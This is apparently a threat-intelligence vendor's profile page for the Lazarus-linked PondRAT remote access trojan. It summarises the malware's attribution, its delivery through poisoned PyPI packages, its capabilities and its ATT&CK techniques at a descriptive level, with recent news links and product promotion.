Skip to main content
Mallory
Back to malware
MalwareUsed by 3 actors

PondRAT

PondRAT is a remote access trojan associated with North Korea-linked Lazarus activity. Reporting links it with moderate confidence to the Lazarus sub-cluster tracked as Gleaming Pisces, Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, and notes overlap with AppleJeus-related tradecraft. Unit 42 described PondRAT as a lighter version of POOLRAT/SIMPLESEA and documented its delivery via poisoned Python packages uploaded to PyPI, including real-ids, coloredtxt, beautifultext, and minisound. Those packages executed an encoded next-stage payload that retrieved and ran Linux and macOS RAT payloads from a remote server. Documented PondRAT capabilities include arbitrary command execution, file upload, file download, and pausing/sleeping for a predefined interval. The activity was associated with Operation Dream Job-style social-engineering lures using fake job offers and was assessed as targeting developers in order to gain access to supply-chain vendors and ultimately their customers. Additional context shows PondRAT as older Lazarus tooling later replaced in some intrusions by a more advanced memory-only framework. Fox-IT also noted behavior consistent with Lazarus malware development, including a seven-pass secure deletion pattern later seen as consistent with PondRAT and POOLRAT. Detection context mentions YARA coverage for PondRAT and that one Linux detection approach matches hexadecimal patterns in ELF binaries.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Lazarus

Researchers identified the malware during incident response investigations where older Lazarus tooling, including ThemeForestRAT and PondRAT, had been replaced with a significantly more advanced memory-only framework.

via polyswarmblog.polyswarm.io
AppleJeus

In one investigation, we observed that the actor had replaced ThemeForestRAT and PondRAT with a more sophisticated memory-only toolset.

via foxit blogblog.fox-it.com
TraderTraitor

Lazarus Group Expands Malware Arsenal With PondRAT, ThemeForestRAT, and RemotePE

via cloudatg insightscloudatg.com
MITRE ATT&CK

Techniques & procedures

5 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1195.001Compromise Software Dependencies and Development ToolsEvidence1
TacticInitial Access

"The attackers behind this campaign uploaded several poisoned Python packages to PyPI..." ... "Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."

T1566.001Spearphishing AttachmentEvidence1
TacticInitial Access

"Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware."

Stealth

2 techniques
T1070Indicator RemovalEvidence1
TacticStealth

Before contacting its command-and-control server, it removes security hooks placed by endpoint protection products and disables Windows event tracing, allowing the malware to operate with little or no visibility to defenders.

T1070.004File DeletionEvidence3
TacticStealth

RemotePE also implements secure file deletion functionality by repeatedly overwriting files seven times prior to deletion, behavior previously associated with Lazarus-linked malware families such as PondRAT and POOLRAT.

Command and Control

1 technique
T1071Application Layer ProtocolEvidence1
TacticCommand and Control

"...runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server." ... "the mechanism that handles commands from the [command-and-control server] is nearly identical."

ACTIVITY FEED

Recent activity

9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

9 SOURCESView more in app
security online infoNews
May 29, 2026
Lazarus Memory-Only Toolset Discovered

An older implant previously used by the threat actors before transitioning to the newer memory-only Lazarus toolset.

Read more
polyswarmNews
May 29, 2026
Lazarus Expands Financial Espionage Operations With Memory-Resident RemotePE RAT

An older Lazarus-linked RAT referenced for overlap in secure deletion behavior and as prior tooling replaced by the newer framework.

Read more
security affairsNews
May 26, 2026
Lazarus APT unveils fileless RAT designed to evade detection

A Lazarus RAT referenced as an older tool replaced by RemotePE; the article also notes a seven-pass overwrite pattern in RemotePE consistent with PondRAT.

Read more
foxit blogNews
May 22, 2026
RemotePE: The Lazarus RAT that lives in memory - Fox-IT International blog

A RAT previously associated with this Lazarus subgroup; the article notes RemotePE shares a secure deletion pattern consistent with PondRAT.

Read more
+5 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping5

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.